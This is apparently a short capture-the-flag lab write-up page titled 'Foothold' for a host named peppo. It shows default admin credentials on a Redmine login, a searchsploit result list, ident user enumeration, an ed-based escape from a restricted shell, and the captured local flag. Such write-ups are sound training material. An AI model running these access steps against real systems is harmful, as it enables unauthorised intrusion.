Foothold

http://192.168.186.60:8080/login

admin:admin

Pwned123!

❯ searchsploit Redmine
------------------------------------------------------------- ---------------------------------
 Exploit Title                                               |  Path
------------------------------------------------------------- ---------------------------------
Redmine 0.8.6 - Cross-Site Request Forgery (Add Admin)       | multiple/webapps/10424.txt
Redmine 1.0.1/1.1.1 - 'projects/hg-hellowword/news/' Cross-S | php/webapps/35572.txt
Redmine SCM Repository - Arbitrary Command Execution (Metasp | linux/remote/41695.rb
Redmine SCM Repository 0.9.x/1.0.x - Arbitrary Command Execu | linux/webapps/16889.rb
------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Fat rabbit hole lol

❯ ident-user-enum 192.168.186.60 22 113 5432 8080 10000
ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )

192.168.186.60:22       root
192.168.186.60:113      nobody
192.168.186.60:5432     <unknown>
192.168.186.60:8080     <unknown>
192.168.186.60:10000    eleanor

eleanor@peppo:~$ ed
!/bin/sh
$ /bin/bash
eleanor@peppo:~$ export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
eleanor@peppo:~$ ls
bin  helloworld  local.txt
eleanor@peppo:~$ cat local.txt
c27d0ae903a1dbee7ff21938bebe4ac1
eleanor@peppo:~$

Previous8080 NextEnumeration

Last updated 4 months ago